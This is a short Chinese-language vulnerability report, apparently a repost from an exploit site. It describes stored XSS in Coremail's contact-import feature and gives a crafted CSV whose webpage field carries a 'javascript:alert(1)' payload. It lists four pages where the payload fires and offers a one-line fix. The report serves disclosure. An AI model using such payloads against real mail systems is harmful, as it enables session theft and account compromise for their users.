Coremail某功能多处存储型XSS漏洞

coremail在个人通讯录处可以导入联系人，格式为csv。

导入如下CSV：

联系组,姓名,电子邮件地址,住宅地址,住宅地址 邮政编码,住宅电话,移动电话,单位,商务地址,商务地址 邮政编码,商务电话,商务传真,生日,即时信息地址,网页,__cm_group
aaaaaaa,,@qq.com,,,,13132132132,,,,,,19881212,,javascript：alert(1)
,,,,,,,,,,,,,,,FRIENDS=
,,,,,,,,,,,,,,,FAMILY=
,,,,,,,,,,,,,,,COWORKERS=
,,,,,,,,,,,,,,,NETFRIENDS=网友
,,,,,,,,,,,,,,,VIP=重要联系人

可见主页面已经转义了，没有触发：

但各个功能页面都存在触发的问题，列举如下：1.新建联系组时触发：


2.打印联系人时触发：


3.编辑组时触发：


4.清空联系人邮件时触发：

解决方案：

dom操作该过滤的过滤

原文地址:https://exploits.77169.com/2015/20150414023200.shtm